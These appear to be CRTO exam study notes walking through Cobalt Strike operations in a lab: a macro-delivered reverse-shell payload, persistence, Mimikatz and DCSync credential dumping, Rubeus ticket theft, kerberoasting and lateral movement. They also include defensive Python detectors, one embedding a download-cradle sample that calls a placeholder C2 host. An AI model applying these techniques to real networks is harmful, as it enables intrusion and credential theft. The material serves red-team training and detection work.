CRTO & Cobalt Strike
This page contains all the notes required to pass the CRTO exam, together with the lab instructions.
Last updated
To start Cobalt Strike we need two things:
Team Server (this only runs on the Linux machine)
Cobalt Strike Client
First we need a Linux box on which the teamserver will run. I already have one, so I will open the Linux VM from the Windows machine and start the teamserver there. The arguments passed to the teamserver are:
10.10.5.50 is the IP address of the attacker Linux VM.
Passw0rd! is the shared password used to connect from the Cobalt Strike client.
webbug.profile is an example Malleable C2 profile (covered in more detail later).
Now the teamserver is up, so we need to start Cobalt Strike itself.
After the teamserver has started, we start the Cobalt Strike client and provide the connection details:
I added a random alias.
Host should be the machine where the teamserver is running.
You can use any username.
Password must be the one you chose when starting the teamserver.
We can set up listeners in Cobalt Strike by pressing the headphones button at the top.
Now we can click the Add button at the bottom and add listeners; the available types include:
http
dns
https
smb
Below is an example of the HTTP listener.
The other listeners are set up in the same way.
For the SMB listener we can list the named pipes on our own system and choose one of those; we do not use the Cobalt Strike default pipe name because it is easily detected by AVs.
We can use any of the above to set the listener.
We can run Cobalt Strike as a service, so that the teamserver starts with the Linux machine and we don't need to start it by hand each time.
First we need to create a unit file in /etc/systemd/system
then add the following content to it
Now we need to reload the system manager
Now let's check the status of the teamserver service we created
Now let's start the teamserver service
and enable the teamserver service as well
Now every time the Linux machine starts, the teamserver service will run automatically.
We can generate all payloads in Cobalt Strike; I will choose the last option, Windows Stageless Generate All Payloads.
All the payloads will now be generated in C:\Payloads.
We can open Word and go to View -> Macros -> Create Macro.
Make sure you name it AutoOpen and select Document1 from the drop-down.
Now I will write a small piece of code to open Notepad,
then we need to save it and run it, and we will see Notepad running.
Now I will use the Cobalt Strike Scripted Web Delivery to host a payload and get a reverse shell.
Now my payload is hosted and we get the following command, which we can insert in the macro, and once the macro
Below is how the final code looks; make sure you use two double quotes to escape each quote inside the VBA string.
In Site Management I can see that my payload is hosted and listening on port 80.
Once someone opens the document and the macro runs, I get a reverse shell in my Cobalt Strike.
Persistence is a method of regaining or maintaining access to a compromised machine, without having to exploit the initial compromise steps all over again. Workstations are volatile since users tend to logout or reboot them frequently.
If you've gained initial access through a phishing campaign, it's unlikely you'll be able to do so again if your current Beacon is lost, which could be the end of the engagement. If you're on an assume-breach (or indeed in this lab) and have access to an internal host, the loss of complete access to the environment is less of a concern. However, you may still need to drop one or more persistence mechanisms on hosts you control if your simulated threat would also do so.
Common userland persistence methods include:
HKCU / HKLM Registry Autoruns
Scheduled Tasks
Startup Folder
Cobalt Strike doesn't include any built-in commands specifically for persistence. SharPersist is a Windows persistence toolkit written by FireEye. It's written in C#, so it can be executed via execute-assembly.
The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.
I will first convert the PowerShell download cradle into base64 so I can avoid the problem with double quotes and special characters.
Now I will use SharPersist
I can confirm on the target system as well by opening the Task Scheduler.
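From the defender's side, the scheduled task created above is what ends up on disk: a logon-triggered task whose action is powershell.exe with a base64-encoded argument. The following is an added example (not part of these notes or of SharPersist) that parses an exported task XML, decodes a -enc argument the way PowerShell does (UTF-16LE inside base64) and flags cradle patterns; the task XML, the placeholder URL and the paths are constructed for the example.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Namespace of the XML that Task Scheduler exports ("schtasks /query /xml").
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|-w\s+hidden|-nop\b", re.I)

# Constructed sample data (not from the lab): the placeholder URL and the task XML below are made up.
PLACEHOLDER_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/a')"
ENC = base64.b64encode(PLACEHOLDER_CRADLE.encode("utf-16-le")).decode()
TASK_TEMPLATE = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>{cmd}</Command><Arguments>{args}</Arguments></Exec></Actions>
</Task>"""
SUSPICIOUS_TASK = TASK_TEMPLATE.format(cmd="powershell.exe", args="-nop -w hidden -enc " + ENC)
BENIGN_TASK = TASK_TEMPLATE.format(cmd="C:\\Tools\\backup.exe", args="--daily")

def decode_encoded_command(args):
    """Return the plaintext behind a -enc/-EncodedCommand argument, or None if there is none."""
    m = ENC_FLAG.search(args)
    if not m:
        return None
    try:
        # PowerShell expects the base64 to wrap UTF-16LE text, so decode it that way.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_task(task_xml):
    """Inspect every <Exec> action of one task: decode encoded PowerShell and flag cradle patterns."""
    root = ET.fromstring(task_xml)
    decoded, findings = [], []
    for exe in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = exe.findtext("t:Command", default="", namespaces=NS).strip()
        args = exe.findtext("t:Arguments", default="", namespaces=NS).strip()
        plain = decode_encoded_command(args)
        if plain is not None:
            decoded.append(plain)
            findings.append(f"encoded PowerShell command run by {cmd}")
        if CRADLE.search(args) or (plain and CRADLE.search(plain)):
            findings.append("download cradle / hidden window pattern in action")
    return {"decoded": decoded, "findings": findings}

if __name__ == "__main__":
    for name, xml in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, triage_task(xml))
```

On a real host the same function can be fed the output of schtasks /query /xml for each task, and the decoded text is what an analyst compares against the Scripted Web Delivery cradle.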
Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcuts, etc.).
We can go to the startup folder on the target machine to confirm.
AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.
For this we need to upload our exe file to the target machine and then set it to run on every boot.
Cobalt Strike has a built-in version of Mimikatz that we can use to extract various credential types. However, there are some differences with how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed. This means you can't run two "related" commands, such as:
Since CS 4.8, you can chain multiple commands together by separating them with a semi-colon.
The ! elevates Beacon to SYSTEM before running the given command, which is useful in cases where you're running in high-integrity but need to impersonate SYSTEM. In most cases, ! is a direct replacement for token::elevate. For example:
We can also use the shorthand command for this in Cobalt Strike
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only. These can be extracted with the lsadump::sam Mimikatz module. If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.
Unfortunately, the format of these cached domain credential hashes (DCC2) is not NTLM, so they can't be used for pass-the-hash. The only viable use for them is to crack them offline.
The lsadump::cache Mimikatz module can extract these from HKLM\SECURITY.
To crack these with hashcat, we need to transform them into the expected format. The example hashes page shows us it should be $DCC2$<iterations>#<username>#<hash>.
One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily. Rubeus is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.
Its triage command will list all the Kerberos tickets in your current logon session and, if elevated, from all logon sessions on the machine.
Rubeus' dump command will extract these tickets from memory, but because it uses WinAPIs, it does not need to open suspicious handles to LSASS. If not elevated, we can only pull tickets from our own session. Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the /luid and /service parameters.
For example, if we only wanted the TGT for jking, we can do:
The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.
Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.
First we will import PowerView into memory.
We can run the following commands to enumerate the domain.
To get information about the domain:
Returns the domain controllers for the current or specified domain.
Returns all domains for the current forest or the forest specified by -Forest.
Returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. Useful for finding information such as the domain password policy.
Return all (or specific) user(s). To only return specific properties, use -Properties. By default, all user objects for the current domain are returned; use -Identity to return a specific user.
Return all computers or specific computer objects.
Search for all organization units (OUs) or specific OU objects.
Return all domain groups or specific domain group objects.
Return the members of a specific domain group.
Return all Group Policy Objects (GPOs) or specific GPO objects. To enumerate all GPOs that are applied to a particular machine, use -ComputerIdentity.
Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences. You can then manually find which OUs, and by extension which computers, these GPOs apply to.
Enumerates the machines where a specific domain user/group is a member of a specific local group. This is useful for finding where domain groups have local admin access, which is a more automated way to perform the manual cross-referencing described above.
Return all domain trusts for the current or specified domain.
If we have the NTLM hash of a user we can use Cobalt Strike to perform a pass-the-hash attack; after passing the hash we can list the C$ share of another computer to check whether we now have access to it.
Moving laterally between computers in a domain is important for accessing sensitive information/materials, and obtaining new credentials. Cobalt Strike provides three strategies for executing Beacons/code/commands on remote targets.
The first and most convenient is to use the built-in jump command; the syntax is jump [method] [target] [listener]. Type jump to see a list of methods. This will spawn a Beacon payload on the remote target, and if using a P2P listener, will connect to it automatically.
The second strategy is to use the built-in remote-exec command; the syntax is remote-exec [method] [target] [command]. Type remote-exec to see a list of methods.
Each of these strategies is compatible with the various techniques described in the User Impersonation chapter. For example, you can use pth to impersonate a user and then jump to move laterally.
We can use Rubeus to find the kerberoastable users and request their TGSs; the command below finds all the kerberoastable users and returns a TGS for each.
A much safer approach is to enumerate possible candidates first and roast them selectively. This LDAP query will find domain users who have an SPN set.
We can also target a specific user for kerberoasting; an individual account can be roasted with the /user parameter.
If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password.
As with kerberoasting, we don't want to asreproast every account in the domain.
We can use the command below with Rubeus to AS-REP roast the user squid_svc.
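Both roasting techniques above leave a footprint on the domain controller: kerberoasting shows up as 4769 service-ticket requests with RC4 encryption for user-account SPNs, and AS-REP roasting as 4768 TGT requests with PreAuthType 0, while roasting every account (as the notes warn against) produces many such events from one source. The following added example (not part of these notes or of Rubeus) runs those checks over constructed 4768/4769 records; the hosts, IP addresses and service account names in the sample are made up.

```python
from collections import defaultdict

# RC4-HMAC (0x17) and RC4-HMAC-EXP (0x18) etype values as Windows writes them to the event.
RC4_ETYPES = {"0x17", "0x18"}

# Constructed sample events (not real lab logs) in key=value form; the field names mirror the
# EventData of 4768 (TGT requested) and 4769 (service ticket requested) on a domain controller.
SAMPLE_EVENTS = """\
EventID=4769 TargetUserName=jking ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.120.5
EventID=4769 TargetUserName=jking ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.120.5
EventID=4769 TargetUserName=jking ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.10.120.5
EventID=4769 TargetUserName=WEB01$ ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.10.120.9
EventID=4768 TargetUserName=squid_svc ServiceName=krbtgt PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.120.5
EventID=4768 TargetUserName=jking ServiceName=krbtgt PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.120.9
"""

def parse_events(text):
    """Turn one key=value record per line into a list of dicts."""
    return [dict(kv.split("=", 1) for kv in line.split()) for line in text.splitlines() if line.strip()]

def roasting_indicators(events, mass_threshold=3):
    """Flag RC4 service tickets for user SPNs (kerberoast), TGTs issued without
    pre-authentication (AS-REP roast) and one source asking for many SPNs (mass roasting)."""
    findings = []
    rc4_spns_by_source = defaultdict(set)
    for e in events:
        svc, etype, src = e.get("ServiceName", ""), e.get("TicketEncryptionType", ""), e.get("IpAddress", "?")
        # 4769: a user-account SPN (not a machine account, not krbtgt) served with RC4 is the classic
        # kerberoast signature, because Windows clients normally negotiate AES where the account supports it.
        if e["EventID"] == "4769" and etype in RC4_ETYPES and not svc.endswith("$") and svc != "krbtgt":
            findings.append(f"kerberoast candidate: {e['TargetUserName']} got an RC4 TGS for {svc} from {src}")
            rc4_spns_by_source[src].add(svc)
        # 4768: PreAuthType 0 means no pre-auth was required; with RC4 that reply is crackable offline.
        if e["EventID"] == "4768" and e.get("PreAuthType") == "0" and etype in RC4_ETYPES:
            findings.append(f"as-rep roast candidate: TGT for {e['TargetUserName']} without pre-auth from {src}")
    for src, spns in rc4_spns_by_source.items():
        if len(spns) >= mass_threshold:
            findings.append(f"mass roasting: {src} requested RC4 tickets for {len(spns)} distinct SPN accounts")
    return findings

if __name__ == "__main__":
    for finding in roasting_indicators(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

The mitigations the detections point at are the usual ones: AES-only service accounts, long random service account passwords, and re-enabling pre-authentication on any account that has it switched off.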
This query will return all computers that are permitted for unconstrained delegation.
Rubeus triage will show all the tickets that are currently cached. TGTs can be identified by the krbtgt service.
We can simply extract this TGT and leverage it via a new logon session.